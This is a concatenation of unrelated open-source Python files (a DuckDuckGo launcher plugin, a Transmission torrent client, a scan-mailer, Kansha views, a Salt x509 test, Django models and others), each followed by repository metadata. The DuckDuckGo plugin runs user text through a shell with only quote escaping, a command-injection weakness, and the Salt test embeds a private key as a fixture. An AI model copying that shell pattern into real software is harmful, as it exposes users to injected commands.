def handle_search_result(self, gdaemonfile=None, response=None):
# This function parses the results from the query
# The results returned from DDG are a little convoluted
# so we have to check for many different types of results here
        result_count = 0
try:
response = self.stream.load_contents_finish(response)[0]
except self.GError, e:
# no need to worry if there's no response: maybe there's no internet
# connection...
self.c.handle_search_error(self, 'no response')
return
raw_results = self.loads(response)
# print raw_results
parsed_results = []
if 'Error' in raw_results:
self.c.handle_search_error(self, raw_results['Error'])
return
# check for an abstract section
try:
if raw_results['Abstract']:
item = {
'name': raw_results['Heading'],
'tooltip': '(%s) %s' % (raw_results['AbstractSource'], raw_results['AbstractText']),
'icon name': 'text-html',
'type': 'xdg',
'command': raw_results['AbstractURL'],
'context menu': None,
}
parsed_results.append(item)
result_count += 1
except KeyError:
pass
# check for a definition section
try:
if raw_results['Definition']:
item = {
'name': '%s (Definition)' % raw_results['Heading'],
'tooltip': '(%s) %s' % (raw_results['DefinitionSource'], raw_results['Definition']),
'icon name': 'text-html',
'type': 'xdg',
'command': raw_results['DefinitionURL'],
'context menu': None,
}
parsed_results.append(item)
result_count += 1
except KeyError:
pass
# check for a related topics section
try:
if raw_results['RelatedTopics']:
for raw_result in raw_results['RelatedTopics']:
if result_count >= self.result_limit: break
#some related topics have a 'Topics' sub list
try:
for result in raw_result['Topics']:
if result_count >= self.result_limit: break
item = {
'name': result['Text'],
'tooltip': result['FirstURL'],
'icon name': 'text-html',
'type': 'xdg',
'command': result['FirstURL'],
'context menu': None,
}
parsed_results.append(item)
result_count += 1
except KeyError:
#otherwise the RelatedTopic is a single entry
item = {
'name': raw_result['Text'],
'tooltip': raw_result['FirstURL'],
'icon name': 'text-html',
'type': 'xdg',
'command': raw_result['FirstURL'],
'context menu': None,
}
parsed_results.append(item)
result_count += 1
except KeyError:
pass
# check for external results section
try:
if raw_results['Results']:
for raw_result in raw_results['Results']:
if result_count >= self.result_limit: break
item = {
'name': raw_result['Text'],
'tooltip': raw_result['FirstURL'],
'icon name': 'text-html',
'type': 'xdg',
'command': raw_result['FirstURL'],
'context menu': None,
}
parsed_results.append(item)
result_count += 1
except KeyError:
pass
if parsed_results:
parsed_results.append(self.action)
self.c.handle_search_result(self, parsed_results, self.current_query)
    def more_results_action(self, text):
        # subprocess is normally provided by the Cardapio host's namespace;
        # imported here so this method also stands on its own
        import subprocess
        text = text.replace("'", r"\'")
        text = text.replace('"', r'\"')
try:
subprocess.Popen(self.action_command % text, shell=True)
except OSError, e:
self.c.write_to_log(self, 'Error launching plugin action.', is_error=True)
self.c.write_to_log(self, e, is_error=True)
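# --- Illustrative sketch (not part of the original plugin) ---
# handle_search_result() above walks several optional sections of the
# DuckDuckGo JSON, which is why every lookup is guarded. A stripped-down,
# standalone version of the same walk over a hand-made response dict:
def _collect_ddg_titles(raw_results, limit=5):
    titles = []
    if raw_results.get('Abstract'):
        titles.append(raw_results['Heading'])
    for topic in raw_results.get('RelatedTopics', []):
        # a RelatedTopic is either a plain entry or a {'Topics': [...]} group
        for entry in topic.get('Topics', [topic]):
            if len(titles) >= limit:
                return titles
            titles.append(entry['Text'])
    return titles
# _collect_ddg_titles({'Abstract': 'x', 'Heading': 'Python',
#                      'RelatedTopics': [{'Text': 'CPython'}]})
# -> ['Python', 'CPython']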
|
daboross/cardapio
|
src/plugins/duckduck.py
|
Python
|
gpl-3.0
| 8,409
| 0.002259
|
# Author: Mr_Orange <mr_orange@hotmail.it>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
import re
import json
from base64 import b64encode
import sickbeard
from .generic import GenericClient
class TransmissionAPI(GenericClient):
def __init__(self, host=None, username=None, password=None):
super(TransmissionAPI, self).__init__('Transmission', host, username, password)
if not self.host.endswith('/'):
self.host = self.host + '/'
if self.rpcurl.startswith('/'):
self.rpcurl = self.rpcurl[1:]
if self.rpcurl.endswith('/'):
self.rpcurl = self.rpcurl[:-1]
self.url = self.host + self.rpcurl + '/rpc'
def _get_auth(self):
post_data = json.dumps({'method': 'session-get', })
try:
self.response = self.session.post(self.url, data=post_data.encode('utf-8'), timeout=120,
verify=sickbeard.TORRENT_VERIFY_CERT)
            self.auth = re.search(r'X-Transmission-Session-Id:\s*(\w+)', self.response.text).group(1)
        except Exception:
return None
self.session.headers.update({'x-transmission-session-id': self.auth})
#Validating Transmission authorization
post_data = json.dumps({'arguments': {},
'method': 'session-get',
})
self._request(method='post', data=post_data)
return self.auth
def _add_torrent_uri(self, result):
arguments = {'filename': result.url,
'paused': 1 if sickbeard.TORRENT_PAUSED else 0,
'download-dir': sickbeard.TORRENT_PATH
}
post_data = json.dumps({'arguments': arguments,
'method': 'torrent-add',
})
self._request(method='post', data=post_data)
return self.response.json()['result'] == "success"
def _add_torrent_file(self, result):
arguments = {'metainfo': b64encode(result.content),
'paused': 1 if sickbeard.TORRENT_PAUSED else 0,
'download-dir': sickbeard.TORRENT_PATH
}
post_data = json.dumps({'arguments': arguments,
'method': 'torrent-add',
})
self._request(method='post', data=post_data)
return self.response.json()['result'] == "success"
def _set_torrent_ratio(self, result):
ratio = None
if result.ratio:
ratio = result.ratio
mode = 0
if ratio:
if float(ratio) == -1:
ratio = 0
mode = 2
elif float(ratio) >= 0:
ratio = float(ratio)
mode = 1 # Stop seeding at seedRatioLimit
arguments = {'ids': [result.hash],
'seedRatioLimit': ratio,
'seedRatioMode': mode
}
post_data = json.dumps({'arguments': arguments,
'method': 'torrent-set',
})
self._request(method='post', data=post_data)
return self.response.json()['result'] == "success"
def _set_torrent_seed_time(self, result):
if sickbeard.TORRENT_SEED_TIME and sickbeard.TORRENT_SEED_TIME != -1:
time = int(60 * float(sickbeard.TORRENT_SEED_TIME))
arguments = {'ids': [result.hash],
'seedIdleLimit': time,
'seedIdleMode': 1
}
post_data = json.dumps({'arguments': arguments,
'method': 'torrent-set',
})
self._request(method='post', data=post_data)
return self.response.json()['result'] == "success"
else:
return True
def _set_torrent_priority(self, result):
arguments = {'ids': [result.hash]}
if result.priority == -1:
arguments['priority-low'] = []
elif result.priority == 1:
# set high priority for all files in torrent
arguments['priority-high'] = []
            # move torrent to the top of the queue
arguments['queuePosition'] = 0
if sickbeard.TORRENT_HIGH_BANDWIDTH:
arguments['bandwidthPriority'] = 1
else:
arguments['priority-normal'] = []
post_data = json.dumps({'arguments': arguments,
'method': 'torrent-set',
})
self._request(method='post', data=post_data)
return self.response.json()['result'] == "success"
api = TransmissionAPI()
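# --- Illustrative sketch (not part of the original client) ---
# Every call above follows the same Transmission JSON-RPC shape: a 'method'
# name plus an 'arguments' dict, POSTed with the x-transmission-session-id
# header obtained in _get_auth(). Building a torrent-add payload by hand
# (the URI and download path below are hypothetical placeholders):
_example_payload = json.dumps({
    'method': 'torrent-add',
    'arguments': {
        'filename': 'magnet:?xt=urn:btih:0000000000000000000000000000000000000000',
        'paused': 0,
        'download-dir': '/downloads',
    },
})
# requests-style usage: session.post(url, data=_example_payload.encode('utf-8'))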
|
Elandril/SickRage
|
sickbeard/clients/transmission_client.py
|
Python
|
gpl-3.0
| 5,249
| 0.00362
|
#!/usr/bin/python
import sys,os
from email.Utils import COMMASPACE, formatdate
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
from email.MIMEImage import MIMEImage
from email.MIMEBase import MIMEBase
from email import Encoders
import smtplib
import XmlDict
function=sys.argv[1]
user=sys.argv[2]
filename=sys.argv[3]
conf = XmlDict.loadXml("global.xml")
for option in conf["menu"]["option"]:
if ((option["type"].lower()==function.lower()) and (option["name"]==user)):
option_selected = option
msg = MIMEMultipart()
msg['Subject'] = conf["subject"]
msg['From'] = conf["source"]
msg['To'] = COMMASPACE.join([option_selected["config"]])
msg['Date'] = formatdate(localtime=True)
text = "Your scanner happely delivered this pdf to your mailbox.\n"
msg.attach( MIMEText(text) )
part = MIMEBase('application', "pdf")
part.set_payload( open(filename,"rb").read() )
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(filename) )
msg.attach(part)
mailer = smtplib.SMTP(conf["smtp"])
#mailer.connect()
mailer.sendmail(conf["source"],option_selected["config"] , msg.as_string())
mailer.close()
|
fcauwe/brother-scan
|
sendfile.py
|
Python
|
gpl-3.0
| 1,234
| 0.016207
|
#--
# Copyright (c) 2012-2014 Net-ng.
# All rights reserved.
#
# This software is licensed under the BSD License, as described in
# the file LICENSE.txt, which you should have received as part of
# this distribution.
#--
from nagare import presentation, security, var, ajax
from nagare.i18n import _
from comp import NewChecklistItem, ChecklistTitle, ChecklistItemTitle, Checklists, Checklist, ChecklistItem
@presentation.render_for(NewChecklistItem)
def render_ChecklistTitle_edit(next_method, self, h, comp, *args):
"""Render the title of the associated object"""
text = var.Var(u'')
with h.form(class_='new-item-form'):
id_ = h.generate_id()
h << h.input(type='text', value=text, id_=id_, placeholder=_(u'Add item')).action(text)
with h.div(class_='btn-group'):
h << h.button(h.i(class_='icon-checkmark'),
class_='btn').action(lambda: comp.answer(text()))
h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer)
if self.focus:
h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_))
self.focus = False
return h.root
@presentation.render_for(ChecklistTitle)
def render_ChecklistTitle(self, h, comp, *args):
"""Render the title of the associated object"""
h << h.i(class_='icon-list')
kw = {}
kw['style'] = 'cursor: pointer;display: inline;'
kw['onclick'] = h.a.action(comp.answer).get('onclick').replace('return', "")
with h.div(class_='text-title', **kw):
content = self.text or h.span(_('Edit title'), class_='show_onhover')
h << content
return h.root
@presentation.render_for(ChecklistTitle, model='edit')
def render_ChecklistTitle_edit(next_method, self, h, comp, *args):
"""Render the title of the associated object"""
text = var.Var(self.text)
with h.form(class_='title-form'):
id_ = h.generate_id()
h << h.i(class_='icon-list')
h << h.input(type='text', value=text, id_=id_, placeholder=_(u'Checklist title')).action(text)
with h.div(class_='btn-group'):
h << h.button(h.i(class_='icon-checkmark'), class_='btn').action(lambda: comp.answer(self.change_text(text())))
h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer)
h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_))
return h.root
@presentation.render_for(ChecklistItemTitle)
def render_ChecklistTitle(self, h, comp, *args):
"""Render the title of the associated object"""
return h.a(self.text).action(comp.answer)
@presentation.render_for(ChecklistItemTitle, model='edit')
def render_ChecklistTitle_edit(next_method, self, h, comp, *args):
"""Render the title of the associated object"""
text = var.Var(self.text)
with h.form(class_='item-title-form'):
id_ = h.generate_id()
h << h.input(type='text', value=text, id_=id_, placeholder=_(u'Checklist title')).action(text)
with h.div(class_='btn-group'):
h << h.button(h.i(class_='icon-checkmark'), class_='btn').action(lambda: comp.answer(self.change_text(text())))
h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer)
h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_))
return h.root
@presentation.render_for(Checklists, 'button')
def render_Checklists_button(self, h, comp, model):
if security.has_permissions('checklist', self.parent):
with h.a(class_='btn').action(self.add_checklist):
h << h.i(class_='icon-list')
h << _('Checklist')
return h.root
@presentation.render_for(Checklists)
def render_Checklists(self, h, comp, model):
if security.has_permissions('checklist', self.parent):
# On drag and drop
action = ajax.Update(action=self.reorder)
action = '%s;_a;%s=' % (h.add_sessionid_in_url(sep=';'), action._generate_replace(1, h))
h.head.javascript(h.generate_id(), '''function reorder_checklists(data) {
nagare_getAndEval(%s + YAHOO.lang.JSON.stringify(data));
}''' % ajax.py2js(action))
# On items drag and drop
action = ajax.Update(action=self.reorder_items)
action = '%s;_a;%s=' % (h.add_sessionid_in_url(sep=';'), action._generate_replace(1, h))
h.head.javascript(h.generate_id(), '''function reorder_checklists_items(data) {
nagare_getAndEval(%s + YAHOO.lang.JSON.stringify(data));
}''' % ajax.py2js(action))
id_ = h.generate_id()
with h.div(class_='checklists', id=id_):
for index, clist in enumerate(self.checklists):
h << clist.on_answer(lambda v, index=index: self.delete_checklist(index))
h << h.script("""$(function() {
$("#" + %(id)s).sortable({
placeholder: "ui-state-highlight",
axis: "y",
handle: ".icon-list",
cursor: "move",
stop: function( event, ui ) { reorder_checklists($('.checklist').map(function() { return this.id }).get()) }
});
$(".checklists .checklist .content ul").sortable({
placeholder: "ui-state-highlight",
cursor: "move",
connectWith: ".checklists .checklist .content ul",
dropOnEmpty: true,
update: function(event, ui) {
var data = {
target: ui.item.closest('.checklist').attr('id'),
index: ui.item.index(),
id: ui.item.attr('id')
}
reorder_checklists_items(data);
}
}).disableSelection();
})""" % {'id': ajax.py2js(id_)})
return h.root
@presentation.render_for(Checklists, 'badge')
def render_Checklists_badge(self, h, comp, model):
if self.checklists:
h << h.span(h.i(class_='icon-list'), ' ', self.nb_items, u' / ', self.total_items, class_='label')
return h.root
@presentation.render_for(Checklist)
def render_Checklist(self, h, comp, model):
with h.div(id='checklist_%s' % self.id, class_='checklist'):
with h.div(class_='title'):
h << self.title
if self.title.model != 'edit':
h << h.a(h.i(class_='icon-cross'), class_='delete').action(comp.answer, 'delete')
with h.div(class_='content'):
if self.items:
h << comp.render(h, 'progress')
with h.ul:
for index, item in enumerate(self.items):
h << h.li(item.on_answer(lambda v, index=index: self.delete_item(index)), id='checklist_item_%s' % item().id)
h << self.new_item
return h.root
@presentation.render_for(Checklist, 'progress')
def render_Checklist_progress(self, h, comp, model):
progress = self.progress
with h.div(class_='progress progress-success'):
h << h.div(class_='bar', style='width:%s%%' % progress)
h << h.span(progress, u'%', class_='percent')
return h.root
@presentation.render_for(ChecklistItem)
def render_ChecklistItem(self, h, comp, model):
h << h.a(h.i(class_='icon-checkbox-' + ('checked' if self.done else 'unchecked'))).action(self.set_done)
h << h.span(self.title, class_='done' if self.done else '')
if not self.title.model == 'edit':
h << h.a(h.i(class_='icon-cross'), class_='delete').action(comp.answer, 'delete')
return h.root
|
Reigel/kansha
|
kansha/checklist/view.py
|
Python
|
bsd-3-clause
| 7,405
| 0.003106
|
import tempfile
import salt.utils.files
from salt.modules import x509 as x509_mod
from salt.states import x509
from tests.support.helpers import dedent
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.mock import MagicMock
from tests.support.unit import TestCase, skipIf
try:
import M2Crypto # pylint: disable=unused-import
HAS_M2CRYPTO = True
except ImportError:
HAS_M2CRYPTO = False
class X509TestCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
return {x509: {"__opts__": {"fips_mode": False}}}
def test_certificate_info_matches(self):
cert_info = {"MD5 Finger Print": ""}
required_info = {"MD5 Finger Print": ""}
ret = x509._certificate_info_matches(cert_info, required_info)
assert ret == (True, [])
class X509FipsTestCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
self.file_managed_mock = MagicMock()
self.file_managed_mock.return_value = {"changes": True}
return {
x509: {
"__opts__": {"fips_mode": True},
"__salt__": {
"x509.get_pem_entry": x509_mod.get_pem_entry,
"x509.get_private_key_size": x509_mod.get_private_key_size,
},
"__states__": {"file.managed": self.file_managed_mock},
}
}
@skipIf(not HAS_M2CRYPTO, "Skipping, M2Crypto is unavailable")
def test_private_key_fips_mode(self):
"""
:return:
"""
test_key = dedent(
"""
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDx7UUt0cPi5G51
FmRBhAZtZb5x6P0PFn7GwnLmSvLNhCsOcD/vq/yBUU62pknzmOjM5pgWTACZj66O
GOFmWBg06v8+sqUbaF9PZ/CxQD5MogmQhYNgfyuopHWWgLXMub2hlP+15qGohkzg
Tr/mXp2ohVAb6ihjqb7XV9MiZaLNVX+XWauM8SlhqXMiJyDUopEGbg2pLsHhIMcX
1twLlyDja+uDbCMZ4jDNB+wsWxTaPRH8KizfEabB1Cl+fdyD10pSAYcodOAnlkW+
G/DX2hwb/ZAM9B1SXTfZ3gzaIIbqXBEHcZQNXxHL7szBTVcOmfx/RPfOeRncytb9
Mit7RIBxAgMBAAECggEAD4Pi+uRIBsYVm2a7OURpURzEUPPbPtt3d/HCgqht1+ZR
CJUEVK+X+wcm4Cnb9kZpL7LeMBfhtfdz/2LzGagurT4g7nlwg0h3TFVjJ0ryc+G0
cVNOsKKXPzKE5AkPH7kNw04V9Cl9Vpx+U6hZQEHzJHqgP5oNyw540cCtJriT700b
fG1q3PYKWSkDwTiUnJTnVLybFIKQC6urxTeT2UWeiBadfDY7DjI4USfrQsqCfGMO
uWPpOOJk5RIvw5r0Of2xvxV76xCgzVTkgtWjBRMTEkfeYx3019xKlQtAKoGbZd1T
tF8DH0cDlnri4nG7YT8yYvx/LWVDg12E6IZij1X60QKBgQD7062JuQGEmTd99a7o
5TcgWYqDrmE9AEgJZjN+gnEPcsxc50HJaTQgrkV0oKrS8CMbStIymbzMKWifOj7o
gvQBVecydq1AaXePt3gRe8vBFiP4cHjFcSegs9FDvdfJR36iHOBIgEp4DWvV1vgs
+z82LT6Qy5kxUQvnlQ4dEaGdrQKBgQD175f0H4enRJ3BoWTrqt2mTAwtJcPsKmGD
9YfFB3H4+O2rEKP4FpBO5PFXZ0dqm54hDtxqyC/lSXorFCUjVUBero1ECGt6Gnn2
TSnhgk0VMxvhnc0GReIt4K9WrXGd0CMUDwIhFHj8kbb1X1yqt2hwyw7b10xFVStl
sGv8CQB+VQKBgAF9q1VZZwzl61Ivli2CzeS/IvbMnX7C9ao4lK13EDxLLbKPG/CZ
UtmurnKWUOyWx15t/viVuGxtAlWO/rhZriAj5g6CbVwoQ7DyIR/ZX8dw3h2mbNCe
buGgruh7wz9J0RIcoadMOySiz7SgZS++/QzRD8HDstB77loco8zAQfixAoGBALDO
FbTocfKbjrpkmBQg24YxR9OxQb/n3AEtI/VO2+38r4h6xxaUyhwd1S9bzWjkBXOI
poeR8XTqNQ0BR422PTeUT3SohPPcUu/yG3jG3zmta47wjjPDS85lqEgtGvA0cPN7
srErcatJ6nlOnGUSw9/K65y6lFeH2lIZ2hfwNM2dAoGBAMVCc7i3AIhLp6UrGzjP
0ioCHCakpxfl8s1VQp55lhHlP6Y4RfqT72Zq7ScteTrisIAQyI9ot0gsuct2miQM
nyDdyKGki/MPduGTzzWlBA7GZEHnxbAILH8kWJ7eE/Nh7zdF1CRts8utEO9L9S+0
lVz1j/xGOseQk4cVos681Wpw
-----END PRIVATE KEY-----"""
)
test_cert = dedent(
"""
-----BEGIN CERTIFICATE-----
MIIDazCCAlOgAwIBAgIUAfATs1aodKw11Varh55msmU0LoowDQYJKoZIhvcNAQEL
BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0yMTAzMjMwMTM4MzdaFw0yMjAz
MjMwMTM4MzdaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
AQUAA4IBDwAwggEKAoIBAQDx7UUt0cPi5G51FmRBhAZtZb5x6P0PFn7GwnLmSvLN
hCsOcD/vq/yBUU62pknzmOjM5pgWTACZj66OGOFmWBg06v8+sqUbaF9PZ/CxQD5M
ogmQhYNgfyuopHWWgLXMub2hlP+15qGohkzgTr/mXp2ohVAb6ihjqb7XV9MiZaLN
VX+XWauM8SlhqXMiJyDUopEGbg2pLsHhIMcX1twLlyDja+uDbCMZ4jDNB+wsWxTa
PRH8KizfEabB1Cl+fdyD10pSAYcodOAnlkW+G/DX2hwb/ZAM9B1SXTfZ3gzaIIbq
XBEHcZQNXxHL7szBTVcOmfx/RPfOeRncytb9Mit7RIBxAgMBAAGjUzBRMB0GA1Ud
DgQWBBT0qx4KLhozvuWAI9peT/utYV9FITAfBgNVHSMEGDAWgBT0qx4KLhozvuWA
I9peT/utYV9FITAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQDx
tWvUyGfEwJJg1ViBa10nVhg5sEc6KfqcPzc2GvatIGJlAbc3b1AYu6677X04SQNA
dYRA2jcZcKudy6eolPJow6SDpkt66IqciZYdbQE5h9elnwpZxmXlJTQTB9cEwyIk
2em5DKpdIwa9rRDlbAjAVJb3015MtpKRu2gsQ7gl5X2U3K+DFsWtBPf+0xiJqUiq
rd7tiHF/zylubSyH/LVONJZ6+/oT/qzJfxfpvygtQWcu4b2zzME/FPenMA8W6Rau
ZYycQfpMVc7KwqF5/wfjnkmfxoFKnkD7WQ3qFCJ/xULk/Yn1hrvNeIr+khX3qKQi
Y3BMA5m+J+PZrNy7EQSa
-----END CERTIFICATE-----
"""
)
fp, name = tempfile.mkstemp()
with salt.utils.files.fopen(name, "w") as fd:
fd.write(test_key)
fd.write(test_cert)
ret = x509.private_key_managed(name)
self.file_managed_mock.assert_called_once()
assert (
self.file_managed_mock.call_args.kwargs["contents"].strip()
== test_key.strip()
)
def test_certificate_info_matches(self):
cert_info = {"MD5 Finger Print": ""}
required_info = {"MD5 Finger Print": ""}
ret = x509._certificate_info_matches(cert_info, required_info)
assert ret == (False, ["MD5 Finger Print"])
|
saltstack/salt
|
tests/unit/states/test_x509.py
|
Python
|
apache-2.0
| 5,661
| 0
|
import re
print " Write product name : "
nume_produs = raw_input()
print " Write product price : "
cost_produs = input()
if (nume_produs == re.sub('[^a-z]',"",nume_produs)):
print ('%s %d'%(nume_produs,cost_produs))
else:
print "Error ! You must tape letters"
input()
|
ActiveState/code
|
recipes/Python/578947_Validate_product/recipe-578947.py
|
Python
|
mit
| 281
| 0.017794
|
from _sha256 import sha256
from typing import Optional
from common.serializers.serialization import domain_state_serializer
from plenum.common.constants import DOMAIN_LEDGER_ID
from plenum.common.request import Request
from plenum.common.txn_util import get_payload_data, get_from, get_req_id
from plenum.server.database_manager import DatabaseManager
from plenum.server.request_handlers.handler_interfaces.write_request_handler import WriteRequestHandler
from plenum.test.constants import BUY
from stp_core.common.log import getlogger
logger = getlogger()
class BuyHandler(WriteRequestHandler):
def __init__(self, database_manager: DatabaseManager):
super().__init__(database_manager, BUY, DOMAIN_LEDGER_ID)
def static_validation(self, request: Request):
self._validate_request_type(request)
def dynamic_validation(self, request: Request, req_pp_time: Optional[int]):
self._validate_request_type(request)
def update_state(self, txn, prev_result, request, is_committed=False):
self._validate_txn_type(txn)
key = self.gen_state_key(txn)
value = domain_state_serializer.serialize({"amount": get_payload_data(txn)['amount']})
self.state.set(key, value)
logger.trace('{} after adding to state, headhash is {}'.
format(self, self.state.headHash))
def gen_state_key(self, txn):
identifier = get_from(txn)
req_id = get_req_id(txn)
return self.prepare_buy_key(identifier, req_id)
@staticmethod
def prepare_buy_key(identifier, req_id):
return sha256('{}{}:buy'.format(identifier, req_id).encode()).digest()
def __repr__(self):
return "TestHandler"
|
evernym/zeno
|
plenum/test/buy_handler.py
|
Python
|
apache-2.0
| 1,707
| 0.001172
|
import os
import finder
import re
import sys
def makefilter(name, xtrapath=None):
typ, nm, fullname = finder.identify(name, xtrapath)
if typ in (finder.SCRIPT, finder.GSCRIPT, finder.MODULE):
return ModFilter([os.path.splitext(nm)[0]])
if typ == finder.PACKAGE:
return PkgFilter([fullname])
if typ == finder.DIRECTORY:
return DirFilter([fullname])
if typ in (finder.BINARY, finder.PBINARY):
return FileFilter([nm])
return FileFilter([fullname])
class _Filter:
def __repr__(self):
return '<'+self.__class__.__name__+' '+repr(self.elements)+'>'
class _NameFilter(_Filter):
""" A filter mixin that matches (exactly) on name """
def matches(self, res):
return self.elements.get(res.name, 0)
class _PathFilter(_Filter):
""" A filter mixin that matches if the resource is below any of the paths"""
def matches(self, res):
p = os.path.normcase(os.path.abspath(res.path))
while len(p) > 3:
p = os.path.dirname(p)
if self.elements.get(p, 0):
return 1
return 0
class _ExtFilter(_Filter):
""" A filter mixin that matches based on file extensions (either way) """
include = 0
def matches(self, res):
fnd = self.elements.get(os.path.splitext(res.path)[1], 0)
if self.include:
return not fnd
return fnd
class _TypeFilter(_Filter):
""" A filter mixin that matches on resource type (either way) """
include = 0
def matches(self, res):
fnd = self.elements.get(res.typ, 0)
if self.include:
return not fnd
return fnd
class _PatternFilter(_Filter):
""" A filter that matches if re.search succeeds on the resource path """
def matches(self, res):
for regex in self.elements:
if regex.search(res.path):
return 1
return 0
class ExtFilter(_ExtFilter):
""" A file extension filter.
ExtFilter(extlist, include=0)
where extlist is a list of file extensions """
def __init__(self, extlist, include=0):
self.elements = {}
for ext in extlist:
if ext[0:1] != '.':
ext = '.'+ext
self.elements[ext] = 1
self.include = include
class TypeFilter(_TypeFilter):
""" A filter for resource types.
TypeFilter(typlist, include=0)
where typlist is a subset of ['a','b','d','m','p','s','x','z'] """
def __init__(self, typlist, include=0):
self.elements = {}
for typ in typlist:
self.elements[typ] = 1
self.include = include
class FileFilter(_NameFilter):
""" A filter for data files """
def __init__(self, filelist):
self.elements = {}
for f in filelist:
self.elements[f] = 1
class ModFilter(_NameFilter):
""" A filter for Python modules.
ModFilter(modlist) where modlist is eg ['macpath', 'dospath'] """
def __init__(self, modlist):
self.elements = {}
for mod in modlist:
self.elements[mod] = 1
class DirFilter(_PathFilter):
""" A filter based on directories.
DirFilter(dirlist)
dirs may be relative and will be normalized.
Subdirectories of dirs will be excluded. """
def __init__(self, dirlist):
self.elements = {}
for pth in dirlist:
pth = os.path.normcase(os.path.abspath(pth))
self.elements[pth] = 1
class PkgFilter(_PathFilter):
"""At this time, identical to a DirFilter (being lazy) """
def __init__(self, pkglist):
#warning - pkgs are expected to be full directories
self.elements = {}
for pkg in pkglist:
pth = os.path.normcase(os.path.abspath(pkg))
self.elements[pth] = 1
class StdLibFilter(_PathFilter):
""" A filter that excludes anything found in the standard library """
def __init__(self):
pth = os.path.normcase(os.path.join(sys.exec_prefix, 'lib'))
self.elements = {pth:1}
class PatternFilter(_PatternFilter):
""" A filter that excludes if any pattern is found in resource's path """
def __init__(self, patterns):
self.elements = []
for pat in patterns:
self.elements.append(re.compile(pat))
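# --- Illustrative sketch (not part of the original module) ---
# All filters above expose matches(res) over a resource carrying .name,
# .path and .typ attributes; a minimal stand-in resource shows the API:
if __name__ == '__main__':
    class _Res:
        def __init__(self, name, path, typ):
            self.name, self.path, self.typ = name, path, typ

    res = _Res('readme', '/tmp/project/readme.txt', 'a')
    print(ExtFilter(['txt']).matches(res))             # 1 -> excluded
    print(ExtFilter(['txt'], include=1).matches(res))  # False -> kept
    print(ModFilter(['readme']).matches(res))          # 1 -> matched by name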
|
toontownfunserver/Panda3D-1.9.0
|
direct/pyinst/tocfilter.py
|
Python
|
bsd-3-clause
| 4,386
| 0.007068
|
'''
Created on Nov 17, 2011
@author: mmornati
'''
from django.http import HttpResponse
from django.utils import simplejson as json
import logging
from celery.result import AsyncResult
from webui.restserver.template import render_agent_template
import sys
logger = logging.getLogger(__name__)
def get_progress(request, taskname, taskid):
logger.info("Requesting taskid: %s"%taskid)
result = AsyncResult(taskid, backend=None, task_name=taskname)
logger.info("TASKID: %s"%result.task_id)
dict = {}
if (result.state == 'PENDING'):
dict['state'] = 'Waiting for worker to execute task...'
elif (result.state == 'PROGRESS'):
dict['state'] = 'Operation in progress..'
else:
dict['state'] = result.state
backend_response = None
try:
backend_response = result.result
    except Exception:
logger.warn(sys.exc_info())
if backend_response:
if isinstance(result.result, tuple):
response,content,agent,action=result.result
if response.status == 200:
json_data = render_agent_template(request, {}, content, {}, agent, action)
return HttpResponse(json_data, mimetype="application/json")
elif response.status == 408:
dict['state'] = 'FAILURE'
dict['message'] = 'TIMEOUT'
else:
if "current" in result.result and "total" in result.result:
value = float(1.0*result.result['current']/result.result['total'])*100
dict['value'] = value
else:
dict.update({"responsecontent": result.result})
else:
dict['value'] = 0
json_data = json.dumps(dict)
return HttpResponse(json_data, mimetype="application/json")
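# --- Illustrative sketch (not part of the original view) ---
# The 'current'/'total' keys read above are published by the worker side;
# a celery task typically emits them via update_state (the task body and
# the 'celery' app name are hypothetical):
#
# @celery.task(bind=True)
# def long_job(self, items):
#     for i, item in enumerate(items):
#         process(item)
#         self.update_state(state='PROGRESS',
#                           meta={'current': i + 1, 'total': len(items)})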
|
kermitfr/kermit-webui
|
src/webui/progress/views.py
|
Python
|
gpl-3.0
| 1,766
| 0.007361
|
from django.db import models
from djangotoolbox.fields import EmbeddedModelField, ListField
from django_mongodb_engine.contrib import MongoDBManager
import os
# Create your models here.
# save the created json file name path
# only one file for summary should be kept here
class UserJSonFile(models.Model):
user_id = models.CharField(max_length=100)
json_type = models.CharField(max_length=10) # possible value is summary for the summary view
json_file_name = models.CharField(max_length=100) # save the name of the already created file name on disk
class Flow(models.Model):
user_id = models.CharField(max_length=100)
hash_value = models.CharField(max_length=50)
file_name = models.CharField(max_length=50)
upload_time = models.DateTimeField()
file_type = models.CharField(max_length=150)
file_size = models.IntegerField()
path = models.FilePathField()
pcaps = ListField(EmbeddedModelField('Pcap', null=True, blank=True))
details = ListField(EmbeddedModelField('FlowDetails', null=True, blank=True))
def __unicode__(self):
return u'%s/%s' % (self.path, self.file_name)
def get_upload_path(self):
hash_dir = os.path.basename(self.path)
root = os.path.basename(os.path.dirname(self.path))
return os.path.join(root, hash_dir)
class Pcap(models.Model):
hash_value = models.CharField(max_length=100)
file_name = models.FileField(upload_to="uploads", null=True, blank=True)
path = models.FilePathField()
